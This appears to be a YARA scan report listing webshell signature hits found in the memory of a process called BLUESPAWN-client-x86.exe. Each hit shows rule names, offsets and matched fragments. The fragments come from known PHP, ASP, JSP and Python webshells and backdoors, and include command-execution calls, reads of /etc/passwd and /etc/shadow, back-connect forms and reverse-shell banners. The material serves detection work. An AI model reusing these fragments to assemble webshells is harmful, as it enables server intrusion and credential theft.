| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Sincap_php_php | Semi-Auto-generated - file Sincap.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb1c8:$s0: $baglan=fopen("/tmp/$ekinci",'r');
- 0x354d10:$s0: $baglan=fopen("/tmp/$ekinci",'r');
- 0x2fb1f7:$s2: $tampon4=$tampon3-1
- 0x354d35:$s2: $tampon4=$tampon3-1
- 0x2fb217:$s3: @aventgrup.net
- 0x3055a6:$s3: @aventgrup.net
- 0x354d4b:$s3: @aventgrup.net
- 0x35c3d5:$s3: @aventgrup.net
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Test_php_php | Semi-Auto-generated - file Test.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb321:$s0: $yazi = "test" . "\r\n";
- 0x31bd41:$s0: $yazi = "test" . "\r\n";
- 0x2fb346:$s2: fwrite ($fp, "$yazi");
- 0x31bd66:$s2: fwrite ($fp, "$yazi");
- 0x2fb369:$s3: $entry_line="HACKed by EntriKa";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Phyton_Shell_py | Semi-Auto-generated - file Phyton Shell.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb48b:$s1: sh_out=os.popen(SHELL+" "+cmd).readlines()
- 0x2fb4c2:$s2: # d00r.py 0.3a (reverse|bind)-shell in python by fQ
- 0x2fb504:$s3: print "error; help: head -n 16 d00r.py"
- 0x2fb538:$s4: print "PW:",PW,"PORT:",PORT,"HOST:",HOST
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | mysql_tool_php_php | Semi-Auto-generated - file mysql_tool.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb668:$s0: $error_text = '<strong>Failed selecting database "'.$this->db['
- 0x35506e:$s0: $error_text = '<strong>Failed selecting database "'.$this->db['
- 0x2f5f9c:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x2fb6b4:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x30db2b:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x350ed6:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x3550b0:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x362922:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x2fb705:$s4: <div align="center">The backup process has now started<br
- 0x3550f7:$s4: <div align="center">The backup process has now started<br
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Zehir_4_asp | Semi-Auto-generated - file Zehir 4.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb839:$s2: </a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time=
- 0x3551d7:$s2: </a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time=
- 0x2fb890:$s4: <input type=submit value="Test Et!" onclick="
- 0x355224:$s4: <input type=submit value="Test Et!" onclick="
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | sh_php_php | Semi-Auto-generated - file sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fb9b5:$s1: $ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e
- 0x3552f5:$s1: $ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e
- 0x2fba12:$s2: Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:
- 0x355348:$s2: Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpbackdoor15_php | Semi-Auto-generated - file phpbackdoor15.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fbb67:$s1: echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["na
- 0x355449:$s1: echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["na
- 0x2fbbb5:$s2: if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FI
- 0x35548d:$s2: if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FI
- 0x2fbc06:$s3: echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s
- 0x3554d4:$s3: echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpjackal_php | Semi-Auto-generated - file phpjackal.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fbd51:$s3: $dl=$_REQUEST['downloaD'];
- 0x3555cb:$s3: $dl=$_REQUEST['downloaD'];
- 0x2fbd78:$s4: else shelL("perl.exe $name $port");
- 0x3555e8:$s4: else shelL("perl.exe $name $port");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | sql_php_php | Semi-Auto-generated - file sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fbe95:$s1: fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#
- 0x3556b1:$s1: fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#
- 0x2f4fbf:$s2: http://rst.void.ru
- 0x2fbec4:$s2: http://rst.void.ru
- 0x2fbee8:$s2: http://rst.void.ru
- 0x3502e1:$s2: http://rst.void.ru
- 0x3556e0:$s2: http://rst.void.ru
- 0x3556fa:$s2: http://rst.void.ru
- 0x2d4d20:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x2fbf07:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x33a561:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x35570f:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | cgi_python_py | Semi-Auto-generated - file cgi-python.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc04a:$s0: a CGI by Fuzzyman
- 0x3557fe:$s0: a CGI by Fuzzyman
- 0x2fc068:$s1: """+fontline +"Version : " + versionstring + """, Running on : """ +
- 0x355812:$s1: """+fontline +"Version : " + versionstring + """, Running on : """ +
- 0x2fc0ba:$s2: values = map(lambda x: x.value, theform[field]) # allows for
- 0x35585a:$s2: values = map(lambda x: x.value, theform[field]) # allows for
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ru24_post_sh_php_php | Semi-Auto-generated - file ru24_post_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc206:$s1: <title>Ru24PostWebShell - ".$_POST['cmd']."</title>
- 0x2fc246:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x307abe:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x355988:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x35e05b:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x2fc2a0:$s4: Writed by DreAmeRz
- 0x307b35:$s4: Writed by DreAmeRz
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DTool_Pro_php | Semi-Auto-generated - file DTool Pro.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc3b0:$s0: r3v3ng4ns\nDigite
- 0x304afd:$s0: r3v3ng4ns\nDigite
- 0x355a94:$s0: r3v3ng4ns\nDigite
- 0x35bbf5:$s0: r3v3ng4ns\nDigite
- 0x2fc3ce:$s1: if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permissi
- 0x355aa8:$s1: if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permissi
- 0x2fc42a:$s3: if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n
- 0x355afa:$s3: if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | telnetd_pl | Semi-Auto-generated - file telnetd.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc56c:$s0: 0ldW0lf
- 0x2fc580:$s1: However you are lucky :P
- 0x355bf2:$s1: However you are lucky :P
- 0x2fc5a5:$s2: I'm FuCKeD
- 0x355c0d:$s2: I'm FuCKeD
- 0x2fc5bc:$s3: ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#
- 0x355c1a:$s3: ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#
- 0x2fc602:$s4: atrix@irc.brasnet.org
- 0x355c56:$s4: atrix@irc.brasnet.org
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | php_include_w_shell_php | Semi-Auto-generated - file php-include-w-shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc729:$s0: $dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd
- 0x355d29:$s0: $dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd
- 0x2fc785:$s1: if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB
- 0x355d7b:$s1: if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fc7e2:$s0: Safe0ver
- 0x2fc853:$s0: Safe0ver
- 0x2fc919:$s0: Safe0ver
- 0x355e22:$s0: Safe0ver
- 0x2fc92e:$s1: Script Gecisi Tamamlayamadi!
- 0x355ec6:$s1: Script Gecisi Tamamlayamadi!
- 0x2fc957:$s2: document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%
- 0x355ee5:$s2: document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shell_php_php | Semi-Auto-generated - file shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fcaa5:$s1: /* We have found the parent dir. We must be carefull if the parent
- 0x2fcaf5:$s2: $tmpfile = tempnam('/tmp', 'phpshell');
- 0x356025:$s2: $tmpfile = tempnam('/tmp', 'phpshell');
- 0x2fcb29:$s3: if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | telnet_cgi | Semi-Auto-generated - file telnet.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x308c85:$s0: www.rohitab.com
- 0x35edad:$s0: www.rohitab.com
- 0x2f597c:$s1: W A R N I N G: Private Server
- 0x2fcc64:$s1: W A R N I N G: Private Server
- 0x350a56:$s1: W A R N I N G: Private Server
- 0x356136:$s1: W A R N I N G: Private Server
- 0x2fcc8e:$s2: print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
- 0x356156:$s2: print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
- 0x2fccd5:$s3: $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $C
- 0x356193:$s3: $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $C
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ironshell_php | Semi-Auto-generated - file ironshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fce0f:$s0: www.ironwarez.info
- 0x356279:$s0: www.ironwarez.info
- 0x2fce2e:$s1: $cookiename = "wieeeee";
- 0x35628e:$s1: $cookiename = "wieeeee";
- 0x2fce53:$s2: ~ Shell I
- 0x304c90:$s2: ~ Shell I
- 0x3562a9:$s2: ~ Shell I
- 0x35bd11:$s2: ~ Shell I
- 0x2fce69:$s3: www.rootshell-team.info
- 0x3562b5:$s3: www.rootshell-team.info
- 0x2fce8d:$s4: setcookie($cookiename, $_POST['pass'], time()+3600);
- 0x3562cf:$s4: setcookie($cookiename, $_POST['pass'], time()+3600);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | backdoorfr_php | Semi-Auto-generated - file backdoorfr.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fcfc1:$s1: www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan
- 0x3563af:$s1: www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan
- 0x2fd01e:$s2: print("<br>Provenance du mail : <input type=\"text\" name=\"provenanc
- 0x356402:$s2: print("<br>Provenance du mail : <input type=\"text\" name=\"provenanc
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | aspydrv_asp | Semi-Auto-generated - file aspydrv.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fd16f:$s0: If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
- 0x3564f2:$s0: If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
- 0x1883:$s1: password
- 0x18ad:$s1: password
- 0xb267:$s1: password
- 0xb85f:$s1: password
- 0xbde8:$s1: password
- 0xbe10:$s1: password
- 0xbe6d:$s1: password
- 0xd6d6:$s1: password
- 0xdbbf:$s1: password
- 0xdbe7:$s1: password
- 0xdc44:$s1: password
- 0xe63a:$s1: password
- 0xe66a:$s1: password
- 0xe702:$s1: password
- 0xe758:$s1: password
- 0xe788:$s1: password
- 0xe820:$s1: password
- 0xe890:$s1: password
- 0xe8c0:$s1: password
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | cmdjsp_jsp | Semi-Auto-generated - file cmdjsp.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fd2ee:$s0: // note that linux = cmd and windows = "cmd.exe /c + cmd"
- 0x2e137a:$s1: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x2fd335:$s1: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x2dde75:$s2: cmdjsp.jsp
- 0x2ddf77:$s2: cmdjsp.jsp
- 0x2e1291:$s2: cmdjsp.jsp
- 0x2e13db:$s2: cmdjsp.jsp
- 0x2fd24e:$s2: cmdjsp.jsp
- 0x2fd37d:$s2: cmdjsp.jsp
- 0x34083c:$s2: cmdjsp.jsp
- 0x3408e1:$s2: cmdjsp.jsp
- 0x342bc9:$s2: cmdjsp.jsp
- 0x342cac:$s2: cmdjsp.jsp
- 0x356596:$s2: cmdjsp.jsp
- 0x356684:$s2: cmdjsp.jsp
- 0x2f323b:$s3: michaeldaw.org
- 0x2f4258:$s3: michaeldaw.org
- 0x2f7375:$s3: michaeldaw.org
- 0x2fd394:$s3: michaeldaw.org
- 0x308eab:$s3: michaeldaw.org
- 0x308eda:$s3: michaeldaw.org
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | h4ntu_shell__powered_by_tsoi_ | Semi-Auto-generated - file h4ntu shell [powered by tsoi | unknown | - 0x2d4933:$s0: h4ntu shell
- 0x2fd40d:$s0: h4ntu shell
- 0x2fd4c0:$s0: h4ntu shell
- 0x305c75:$s0: h4ntu shell
- 0x305d5b:$s0: h4ntu shell
- 0x33a27d:$s0: h4ntu shell
- 0x3566e3:$s0: h4ntu shell
- 0x356769:$s0: h4ntu shell
- 0x35c91d:$s0: h4ntu shell
- 0x35c9bd:$s0: h4ntu shell
- 0x2fd4d8:$s1: system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
- 0x356777:$s1: system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Ajan_asp | Semi-Auto-generated - file Ajan.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2e0bcb:$s1: c:\downloaded.zip
- 0x2e3725:$s1: c:\downloaded.zip
- 0x2fd613:$s1: c:\downloaded.zip
- 0x34276b:$s1: c:\downloaded.zip
- 0x344482:$s1: c:\downloaded.zip
- 0x35685e:$s1: c:\downloaded.zip
- 0x2fd631:$s2: Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
- 0x2fd676:$s3: http://www35.websamba.com/cybervurgun/
- 0x3568ad:$s3: http://www35.websamba.com/cybervurgun/
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHANTASMA_php | Semi-Auto-generated - file PHANTASMA.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fd79a:$s0: >[*] Safemode Mode Run</DIV>
- 0x35697d:$s0: >[*] Safemode Mode Run</DIV>
- 0x2fd7c3:$s1: $file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>
- 0x35699c:$s1: $file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>
- 0x2fd81c:$s2: [*] Spawning Shell
- 0x3569eb:$s2: [*] Spawning Shell
- 0x2fd83b:$s3: Cha0s
- 0x356a00:$s3: Cha0s
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | MySQL_Web_Interface_Version_0_8_php | Semi-Auto-generated - file MySQL Web Interface Version 0.8.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f74d7:$s0: SooMin Kim
- 0x2fd96a:$s0: SooMin Kim
- 0x351eb5:$s0: SooMin Kim
- 0x356adb:$s0: SooMin Kim
- 0x2fd981:$s1: http://popeye.snu.ac.kr/~smkim/mysql
- 0x356ae8:$s1: http://popeye.snu.ac.kr/~smkim/mysql
- 0x2fd9b2:$s2: href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename
- 0x356b0f:$s2: href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename
- 0x2fda03:$s3: <th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofi
- 0x356b56:$s3: <th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofi
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | simple_cmd_html | Semi-Auto-generated - file simple_cmd.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fdb55:$s1: <title>G-Security Webshell</title>
- 0x30debf:$s1: <title>G-Security Webshell</title>
- 0x2fdb84:$s2: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x30de7b:$s2: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x2fdbc8:$s3: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x30deee:$s3: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x2fdc00:$s4: <? $cmd = $_REQUEST["-cmd"];?>
- 0x30df26:$s4: <? $cmd = $_REQUEST["-cmd"];?>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0001 | Semi-Auto-generated - from files 1.txt, c2007.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fddea:$s0: echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." ("
- 0x356e25:$s0: echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." ("
- 0x2fde3e:$s3: echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x356e6f:$s3: echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0002 | Semi-Auto-generated - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fe06b:$s0: <tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i
- 0x356ff6:$s0: <tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i
- 0x2fe0c8:$s1: $perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v
- 0x357049:$s1: $perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v
- 0x2fe124:$s2: <tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input
- 0x35709b:$s2: <tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0003 | Semi-Auto-generated - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fe362:$s0: .textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa
- 0x357233:$s0: .textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa
- 0x2fe3bf:$s2: <input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''
- 0x357286:$s2: <input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0004 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fe618:$s2: echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ft
- 0x35741f:$s2: echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ft
- 0x2fe66b:$s3: $fqb_log .= "\r\n------------------------------------------\r\nDone!\r
- 0x357468:$s3: $fqb_log .= "\r\n------------------------------------------\r\nDone!\r
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0005 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fe942:$s2: 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner o
- 0x35764b:$s2: 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner o
- 0x2fe99c:$s4: if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult
- 0x35769b:$s4: if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0006 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fec38:$s0: "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze"
- 0x357877:$s0: "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze"
- 0x2fec93:$s2: "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm"
- 0x3578c8:$s2: "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm"
- 0x2fecee:$s4: "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo"
- 0x357919:$s4: "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0007 | Semi-Auto-generated - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fef1c:$s2: echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['
- 0x357aa1:$s2: echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['
- 0x2fef77:$s3: echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db>
- 0x357af2:$s3: echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0008 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2ff251:$s0: if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["
- 0x357cbe:$s0: if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["
- 0x2ff2ab:$s1: if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile
- 0x357d0e:$s1: if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile
- 0x2ff304:$s2: echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_pr
- 0x357d5d:$s2: echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_pr
- 0x2ff35d:$s3: elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($m
- 0x357dac:$s3: elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($m
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0009 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2ff64b:$s0: $sess_data["cut"] = array(); c99_s
- 0x357fa6:$s0: $sess_data["cut"] = array(); c99_s
- 0x2ff67a:$s3: if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl))
- 0x357fcb:$s3: if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl))
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0010 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fde43:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x2ff8be:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x356e74:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x358169:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x2ff909:$s2: c99sh_sqlquery
- 0x3581aa:$s2: c99sh_sqlquery
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0011 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2ffb6c:$s0: else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA
- 0x358333:$s0: else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA
- 0x2ffbc5:$s3: else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspec
- 0x358382:$s3: else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspec
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0012 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2e650f:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x2e6568:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x2ffe46:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x3461ce:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x34621d:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x358529:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x2e653a:$s1: .$arrow."</b>",in('text','
- 0x2ffe7a:$s1: .$arrow."</b>",in('text','
